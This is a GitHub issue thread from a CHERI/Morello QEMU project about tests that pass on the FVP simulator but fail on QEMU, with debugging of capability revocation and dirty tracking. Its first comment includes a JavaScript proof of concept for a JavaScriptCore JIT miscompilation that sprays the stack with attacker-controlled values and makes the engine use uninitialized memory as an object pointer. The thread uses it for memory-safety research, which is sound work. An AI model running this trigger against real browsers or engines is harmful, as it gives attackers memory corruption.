Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Differences between QEMU and FVP on Morello #151

Open
brettferdosi opened this issue Jun 17, 2021 · 10 comments
Open

Differences between QEMU and FVP on Morello #151

brettferdosi opened this issue Jun 17, 2021 · 10 comments
Assignees

Comments

@brettferdosi
Copy link

I have observed different behavior between QEMU and the FVP in two situations. In both cases the program runs to completion on the FVP but dies with a SIGILL on QEMU.

The first situation is running a PoC on the JSC JIT. Build the JIT like this:

cheribuild webkit-morello-purecap --webkit-morello-purecap/backend tier2asm

Then run the following JS file as poc.js:

LD_LIBRARY_PATH=/opt/morello-purecap/webkit/lib/ /opt/morello-purecap/webkit/bin/jsc /path/to/poc.js

   // Fill the stack with the return value of the provided function.

    function stackspray(f) {

        // This function will spill all the local variables to the stack

        // since they are needed for the returned array.

        let v0 = f(); let v1 = f(); let v2 = f(); let v3 = f();

        let v4 = f(); let v5 = f(); let v6 = f(); let v7 = f();

        return [v0, v1, v2, v3, v4, v5, v6, v7];

    }   

    // JIT compile the stack spray.

    for (let i = 0; i < 1000; i++) {

        // call twice in different ways to prevent inlining.

        stackspray(() => 13.37);

        stackspray(() => {});

    }  

    for (let v15 = 0; v15 < 100; v15++) {

        function v19(v23) {

            // This weird loop form might be required to prevent loop unrolling...

            for (let v30 = 0; v30 < 3; v30 = v30 + "asdf") {

                // Generates the specific CFG necessary to trigger the bug.

                const v33 = Error != Error;

                if (v33) {

                } else {

                    // Force a bailout.

                    // CFA will stop here and thus mark the following code as unreachable.

                    // Then, LICM will ignore the memory writes (e.g. initialization of stack slots)

                    // performed by the following code and will then move the memory reads (e.g.

                    // access to stack slots) above the loop, where they will, in fact, be executed.

                    const v34 = (1337)[-12345];

                }
  
                function v38(v41) {

                    // v41 is 8 bytes of uninitialized stack memory here, as

                    // (parts of) this code get moved before the loop as well.


                    return v41.hax = 42;

                }

                for (let v50 = 0; v50 < 10000; v50++) {

                    let inner_o = {inner: 0x41414141, inner2: { a: {b : 1}}};

                    let o = {hax: 42, hax2: inner_o};

                    const v51 = v38(o, ...arguments);

                }

            }

            // Force FTL compilation, probably.

            for (let v53 = 0; v53 < 1000000; v53++) {

            }

        }

        // Put controlled data onto the stack.

        stackspray(() => 3.54484805889626e-310);        // 0x414141414141 in binary

        // Call the miscompiled function.

        const v55 = v19(1337);

    }

The second situation is running cheribsdtests for revocation. Build cheribsd from this branch:

https://github.com/brettferdosi/cheribsd/tree/dev-caprevoke

then run :

cheribsdtest-purecap cheribsdtest_caprevoke_lightly cheribsdtest_caprevoke_capdirty cheribsdtest_caprevoke_loadside

@LawrenceEsswood
Copy link
Contributor

I have been debugging the second part of this (the cheribsdtest-purecap cap). The first failure I got was that revocation logic seems to expect PAN, which was not enabled (and broken with respect to CHERI). Possibly CheriBSD wants to assert the feature is present, as it will make it more obvious why revocation cannot work. I have fixed PAN for QEMU/CHERI, and all the tests now run to completion. cheribsdtest_caprevoke_lightly succeeds, cheribsdtest_caprevoke_capdirty and cheribsdtest_caprevoke_loadside fail. Is this expected?

@brettferdosi
Copy link
Author

brettferdosi commented Jun 23, 2021 via email

@LawrenceEsswood
Copy link
Contributor

Looks like Morello is always treating SC as trapping. I assume revocation is using the dirty tracking?

@LawrenceEsswood
Copy link
Contributor

LawrenceEsswood commented Jun 23, 2021

@brettferdosi @nwf Do either of you know if revocation is reliant on HAF + DS (the hardware implementation of dirty tracking)? Providing it in QEMU seems non-trivial.

Jes has had a quick look, and apparently emulation of dirty tracking might need to grow a capability version as well.

@jrtc27
Copy link
Member

jrtc27 commented Jun 23, 2021

The issue is pmap_fault doesn't have handling for CDBM+SC like it does for DBM+ATTR_S1_AP. Without capdirty we just set SC on pages and do nothing with CDBM, but with the capdirty and thus caprevoke branches that has to change and so CDBM gets set with SC expected to be set when the page is capdirtied by the hardware, and there's no corresponding fallback in pmap_fault.

@jrtc27
Copy link
Member

jrtc27 commented Jun 23, 2021

Since QEMU doesn't currently implement hardware access+dirty tracking for baseline AArch64, as far as we can tell, it seems like the best course of action is to support software capdirty tracking in pmap_fault, even though it's technically not something that should be needed per the Morello spec (at least, if you attempt to turn on hardware dirty tracking, you can still opt to have it off even on systems that support it).

@nwf
Copy link
Member

nwf commented Jun 23, 2021

It shouldn't (I think; @brettferdosi doubtless knows better) be a problem to support "hardware is ignoring CDBM", since we have to do that on RISC-V anyway (where the situation is backwards: the wind cores don't do the AMOs but qemu does).

@brettferdosi
Copy link
Author

I've added support for software capability dirty tracking to CheriBSD and opened a PR for fixing the way faults are generated in the QEMU model: #167.

With these changes, and using the branch in this PR - CTSRD-CHERI/cheribsd#1077 - cheribsdtest_cheri_revoke_capdirty now passes on QEMU. The following tests still fail on QEMU but pass on FVP: cheribsdtest_cheri_revoke_loadside, cheribsdtest_cheri_revoke_lib, cheribsdtest_cheri_revoke_lib_fork. Probably some additional QEMU work is needed on CLG stuff but I haven't looked into it.

@LawrenceEsswood
Copy link
Contributor

Could you try the https://github.com/CTSRD-CHERI/qemu/tree/qemu-morello-wip branch? Lots of MMU bugs have been fixed. It might also need your PR, I will go have a look.

@brettferdosi
Copy link
Author

When I try to run on that branch init crashes with a SIGBUS.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

4 participants